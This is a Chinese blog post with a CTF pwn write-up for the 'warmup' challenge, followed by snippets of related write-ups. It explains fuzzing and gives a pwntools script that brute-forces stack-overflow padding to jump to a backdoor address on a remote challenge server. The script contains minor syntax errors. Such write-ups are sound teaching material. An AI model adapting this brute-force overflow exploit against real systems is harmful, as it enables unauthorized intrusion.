pwn_warmup

最新推荐文章于 2023-05-16 15:19:31 发布
最新推荐文章于 2023-05-16 15:19:31 发布
阅读量339 收藏 1
点赞数
分类专栏: pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44464829/article/details/109407975
版权

这个题没有附件,只好nc服务器:

发现给了我们一个类似地址的东西,该怎么利用。

猜想flag应该就在这个地址,或者这个地址的附近。这里不得不提到一个方法叫做fuzz(模糊测试):

Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。

所以额,我们要写一个函数,这个函数可以为我们生成很多地址,如果这个地址正确了,flag就会被我拿到

def fuzz(r, num, flag):
    payload = 'a' * num
    if flag==1:
        payload += p32(addr)
    if flag==2:
        payload += p64(addr)
    r.recvuntil(">")
    r.sendline(payload)
因为不知道后门函数的位置在哪里,用‘a'*num填充,同时也不知道程序是64位还是32位,所以构造payload发送地址时要分两种情况

from pwn import *
#context.log_level = 'debug'
addr = 0x40060d

def fuzz(r, num, flag):
    payload = 'a' * num
    if flag==1:
        payload += p32(addr)
    if flag==2:
        payload += p64(addr)
    r.recvuntil(">")
    r.sendline(payload)

def main():
    for i in range(1000):
        print(i)
        for j in range(3):
            try:
                r = remote(“220.249.52.133”48144)
                fuzz(r, i, j)
                text = r.recv()
                print('text.len='+str(len(text))+'text='+text)//解析text的内容
                print('num='+str(i)+' flag='+str(j))//打印num 的个数和flag
                r.interactive()
            except:
                r.close()

if __name__ == '__main__':
    main()

有一点像爆破,我们试了1000次。但实际上攻击我们需要对生成的测试用例进行筛选,这道题就暴力破解了。

Alpha-God
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界PWN进阶区(warmup
BurYiA的博客
02-03 1503
warmup 这是一个没有附件的题,看起来题目是要求我们fuzz了 nc连接上后可以发现有个输入点,并且还给了我们一个十六进制数,看起来是个地址 那首先根据这些我们可以先将fuzz函数写出来,分三种情况(不用他给的地址,用p32发送,用p64送) def fuzz(r, num, flag): payload = 'a' * num if flag==1: pa...
pwn-warmup
醉等佳人归
09-08 203
1.题目 1.1.保护机制 不详 1.2.关键代码 没有提供代码 我们使用nc连接之后发现给了一个输入点和一个地址 2.思路 重点1:没有给代码,说明要我们使用fuzz 重点2:猜测给的地址是漏洞利用函数地址,应该可以通过栈溢出去调用, 重点3:所以我们fuzz的参数应该有两个,第一个是num即发送的字符串,第三个是flag即跟随的payload函数(0代表不跟随,1代表32位,2代表64位) from pwn import * from ctypes import * #context(arch="a
buuctf--pwn-warmup
weixin_45427676的博客
09-19 492
下载文件后首先查看保护机制,checksec发现没有开什么保护,64位程序,在IDA中打开查看程序流程 gets()函数很明显会有栈溢出漏洞,然后发现有后门函数,也就是sub_40060D函数,而且会发现你执行此程序的时候可以直接输出后门函数的地址,就不需要再找他的地址了 sprintf(&s, "%p\n", sub_40060D) 这个函数的意思就是将sub_40060D的地址放在s缓冲区中输出地址,所以执行的时候就可以直接看到后门函数地址。 所以现在的漏洞利用思路就是将v5缓冲区覆盖
vn_pwn_warmup(利用ret滑行到rop里)
seaaseesa的博客
04-09 446
vn_pwn_warmup 首先,检查一下程序的保护机制 程序开启了沙箱保护 禁用了execve调用。 然后我们用IDA分析一下,这里没有栈溢出。 然后,我们进入9A1这个函数 这里可以栈溢出,但是仅仅能溢出0x10个字节,显然是不够我们完成open、read、write操作的。 但是,由于该函数是在9D3函数里调用,因此,9A1函数的栈下方就是9D3的栈空间。因此我...
[攻防世界 pwn]——warmup
Y_peak的博客
02-20 614
[攻防世界 pwn]——warmup 题目地址: https://adworld.xctf.org.cn/ 题目: 嘶, 碰过的第一个盲打的题, nc连上之后只有一个地址, 这个地址肯定是个有用的地址, 应该就是可以执行 system("/bin/sh")或者 system(“cat flag”)的地址。 提供了一个输入, 应该是可以进行栈溢出, 不然就太难了。尝试一下, 不过不知道要填充的长度也不知道是64位还是32位的。 我们只有挨个尝试, 写个exp如下: exploit from pwn i
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_...
0ctf_2016_warmup
05-17
2016年0ctf的pwn题。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
buu:pwn warmup_csaw_2016
weixin_60553183的博客
11-29 2616
buu:pwn warmup_csaw_2016 第一次写pwn题,得到文件放入ida 其实一开始和re的题很像,都是寻找关键函数,怎么找,个人理解是要关注输入输出有无比较的地方,这里shb_40060D很明显就是关键函数,点进去,为什么呢,因为gets()函数很明显会有栈溢出漏洞,sub_40060D函数是后门。 找到了system和 cat flag.txt。 进入虚拟机,对文件进行checksec操作 发现没有任何防护 写exp 在终端运行得flag. ...
BUUCTF PWN warmup_csaw_2016
Rt1Text的博客
04-22 398
1.checksec+运行 64位/没有保护 2.64位IDA进行 1.main 函数 明显的溢出函数gets() 跟进v5看看 offset = 0x40+8 shift+f12 真不错,cat flag.txt 找它的地址 3.上脚本 from pwn import* #p=process('./3warmup') p=remote("node4.buuoj.cn",28180) flag_addr=0x400611 payload=b'a'*(0...
攻防世界pwn(warmup&welpwn)
song_10的博客
05-21 438
攻防世界pwn题题解记录
PWN做题笔记12-warmup(栈盲溢出)
qq_40923256的博客
05-16 213
这道题没给附件,nc一下,程序给了个地址,之后可以进行一次输入,之后就没有反馈了,推测该地址就是要溢出跳转的地址,会cat flag。因此,二者结合并加入try-except接收recv的输出并绕过interactive,直到接收到输出,还是很巧妙地~整不出什么花活,直接简单的溢出。
CTF(pwn)攻防世界warmup
半岛铁盒的博客
03-06 864
题目描述 这种题很有意思,只给了题目场景地址没有文件,让你盲打,类似于web中的盲注吧; nc连接,给了 目标地址, 思路是:利用栈溢出覆盖,返回这个地址; 具体是溢出多少是不确定的,是P64(),还是 P32() 也是不确定的; 写个EXP逐渐试一下 from pwn import * a = 0x40060d for i in range(10,100): p = remote('111.200.241.244',49684) payload='a'*i+p64(a) p.recvun
攻防世界warmup pwn wp(fuzz)
苗_的博客
10-15 737
发现这题没给附件,所以是要fuzz的题目(最开始不知道什么叫fuzz = =,在这里解释一下,(fuzzing)模糊测试的意思,百度是这样解释的:模糊测试(Fuzzing),是一种通过向目标系统提供非预期的输入并监视异常结果来发现软件漏洞的方法。 首先先远程看一下: 可以发现给了我们一个十六进制数(应该是地址) 那首先根据这些我们可以先将fuzz函数写出来,分三种情况——不用他给的地址(0),用p32发送(1),用p64送(2) exp from pwn import* addr = 0x
攻防世界PWN进阶区pwn100/pwn200/warmup
weixin_45461609的博客
05-12 493
攻防世界PWN进阶区pwn200pwn100 pwn200 和CTFWIKI上的ret2libc3大同小异。 条件: 1.有read(),write()函数,无system。 2.在函数sub_8048484中存在栈溢出。 思路: 1.通过栈溢出调用write()函数泄露write()对应的 got 表项的内容,此处将write函数的返回地址设置为main或者sub_8048484的地址以便再次利用栈溢出漏洞 2.通过LibcSearcher获取libc版本 3.获取system函数,”/bi
warmup_攻防世界
u014794949
10-29 150
进入页面什么都没有,查看控制台 注释提示source.php,地址栏输入查看源码 提示存在hint.php,访问后显示 得到存储flag的文件名 现在分析满足函数条件的payload 函数作用是分三步检查传进来的参数是否满足白名单: $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; 第一步: if (! isset($page) || !is_string($page)) { echo "y
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
XDiku的博客
11-01 1310
[BUUCTF]pwn栏目 warmup_csaw_2016 1的题解和小疑问,欢迎讨论
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值